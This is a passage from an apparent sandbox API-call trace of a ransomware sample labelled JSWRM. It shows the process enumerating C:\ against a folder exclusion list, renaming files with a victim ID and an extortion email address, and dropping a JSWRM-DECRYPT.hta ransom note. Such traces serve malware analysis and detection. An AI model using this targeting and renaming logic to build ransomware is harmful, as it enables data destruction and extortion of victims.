hHeap=0x1e0000) returned 1 [0064.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0064.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0064.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0064.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0064.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0064.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x68) returned 0x235648 [0064.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0064.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9a) returned 0x2196c0 [0064.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235648 | out: hHeap=0x1e0000) returned 1 [0064.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.526] MoveFileW (lpExistingFileName="C:\\BOOTNXT" (normalized: "c:\\bootnxt"), lpNewFileName="C:\\BOOTNXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\bootnxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0064.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0064.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0064.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0064.527] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xc4ee267e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4ee267e, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xf1c63cdd, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0064.527] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".") returned 1 [0064.527] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="..") returned 1 [0064.527] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="...") returned 1 [0064.527] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="windows") returned -1 [0064.527] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="recovery") returned -1 [0064.527] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="perflogs") returned -1 [0064.527] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="documents and settings") returned -1 [0064.527] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="$RECYCLE.BIN") returned 1 [0064.527] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="system volume information") returned -1 [0064.527] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="msocache") returned -1 [0064.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0064.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOOTSECT.BAK", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOOTSECT.BAK", cchWideChar=12, lpMultiByteStr=0x345fce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOOTSECT.BAK", lpUsedDefaultChar=0x0) returned 12 [0064.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0064.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0064.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOOTSECT.BAK", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BOOTSECT.BAK", cchWideChar=12, lpMultiByteStr=0x345fcb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOOTSECT.BAK", lpUsedDefaultChar=0x0) returned 12 [0064.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0064.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0064.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0064.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345fa04, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0064.527] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.527] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f998 | out: lpFileSize=0x345f998*=10153337049845816) returned 0 [0064.528] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.528] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f9a4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f9a4*=0x0, lpOverlapped=0x0) returned 0 [0064.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.528] CloseHandle (hObject=0xffffffff) returned 1 [0064.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0064.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0064.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0064.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236d68 [0064.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0064.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236d68 | out: hHeap=0x1e0000) returned 1 [0064.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216ac0 [0064.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0064.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.528] MoveFileW (lpExistingFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), lpNewFileName="C:\\BOOTSECT.BAK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\bootsect.bak.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0064.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216ac0 | out: hHeap=0x1e0000) returned 1 [0064.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0064.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0064.529] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0064.529] lstrcmpiW (lpString1="Documents and Settings", lpString2=".") returned 1 [0064.529] lstrcmpiW (lpString1="Documents and Settings", lpString2="..") returned 1 [0064.529] lstrcmpiW (lpString1="Documents and Settings", lpString2="...") returned 1 [0064.529] lstrcmpiW (lpString1="Documents and Settings", lpString2="windows") returned -1 [0064.529] lstrcmpiW (lpString1="Documents and Settings", lpString2="recovery") returned -1 [0064.529] lstrcmpiW (lpString1="Documents and Settings", lpString2="perflogs") returned -1 [0064.529] lstrcmpiW (lpString1="Documents and Settings", lpString2="documents and settings") returned 0 [0064.529] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0064.529] lstrcmpiW (lpString1="ESD", lpString2=".") returned 1 [0064.529] lstrcmpiW (lpString1="ESD", lpString2="..") returned 1 [0064.529] lstrcmpiW (lpString1="ESD", lpString2="...") returned 1 [0064.529] lstrcmpiW (lpString1="ESD", lpString2="windows") returned -1 [0064.529] lstrcmpiW (lpString1="ESD", lpString2="recovery") returned -1 [0064.529] lstrcmpiW (lpString1="ESD", lpString2="perflogs") returned -1 [0064.529] lstrcmpiW (lpString1="ESD", lpString2="documents and settings") returned 1 [0064.529] lstrcmpiW (lpString1="ESD", lpString2="$RECYCLE.BIN") returned 1 [0064.529] lstrcmpiW (lpString1="ESD", lpString2="system volume information") returned -1 [0064.529] lstrcmpiW (lpString1="ESD", lpString2="msocache") returned -1 [0064.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0064.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0064.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0064.529] GetFileAttributesW (lpFileName="C:\\ESD\\JSWRM-DECRYPT.hta" (normalized: "c:\\esd\\jswrm-decrypt.hta")) returned 0xffffffff [0064.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c894, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0064.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23bc78 [0064.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0064.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x23da48 [0064.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23bc78 | out: hHeap=0x1e0000) returned 1 [0064.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.534] CreateFileW (lpFileName="C:\\ESD\\JSWRM-DECRYPT.hta" (normalized: "c:\\esd\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0064.534] SetFilePointer (in: hFile=0x44c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.534] WriteFile (in: hFile=0x44c, lpBuffer=0x345c9a8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c974, lpOverlapped=0x0 | out: lpBuffer=0x345c9a8*, lpNumberOfBytesWritten=0x345c974*=0x230c, lpOverlapped=0x0) returned 1 [0064.535] CloseHandle (hObject=0x44c) returned 1 [0064.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da48 | out: hHeap=0x1e0000) returned 1 [0064.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0064.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0064.536] GetFileAttributesW (lpFileName="C:\\ESD\\JSWRM-DECRYPT.hta" (normalized: "c:\\esd\\jswrm-decrypt.hta")) returned 0x20 [0064.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0064.537] FindFirstFileW (in: lpFileName="C:\\ESD\\*.*", lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0x1d1f8bda, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0064.537] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.537] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0x1d1f8bda, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="..", cAlternateFileName="")) returned 1 [0064.537] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.537] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.537] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d1f8bda, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1d1f8bda, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1d1f8bda, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.537] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0064.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0064.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0064.538] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d1f8bda, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1d1f8bda, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1d1f8bda, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0064.538] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0064.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.538] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3d7ebe9, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0064.538] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0064.538] lstrcmpiW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0064.538] lstrcmpiW (lpString1="hiberfil.sys", lpString2="...") returned 1 [0064.538] lstrcmpiW (lpString1="hiberfil.sys", lpString2="windows") returned -1 [0064.538] lstrcmpiW (lpString1="hiberfil.sys", lpString2="recovery") returned -1 [0064.538] lstrcmpiW (lpString1="hiberfil.sys", lpString2="perflogs") returned -1 [0064.538] lstrcmpiW (lpString1="hiberfil.sys", lpString2="documents and settings") returned 1 [0064.538] lstrcmpiW (lpString1="hiberfil.sys", lpString2="$RECYCLE.BIN") returned 1 [0064.538] lstrcmpiW (lpString1="hiberfil.sys", lpString2="system volume information") returned -1 [0064.538] lstrcmpiW (lpString1="hiberfil.sys", lpString2="msocache") returned -1 [0064.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hiberfil.sys", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hiberfil.sys", cchWideChar=12, lpMultiByteStr=0x345fce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hiberfil.sys", lpUsedDefaultChar=0x0) returned 12 [0064.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0064.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hiberfil.sys", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hiberfil.sys", cchWideChar=12, lpMultiByteStr=0x345fcb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hiberfil.sys", lpUsedDefaultChar=0x0) returned 12 [0064.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0064.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0064.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345fa04, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.539] CreateFileW (lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.821] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f998 | out: lpFileSize=0x345f998*=10149901076009416) returned 0 [0064.821] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 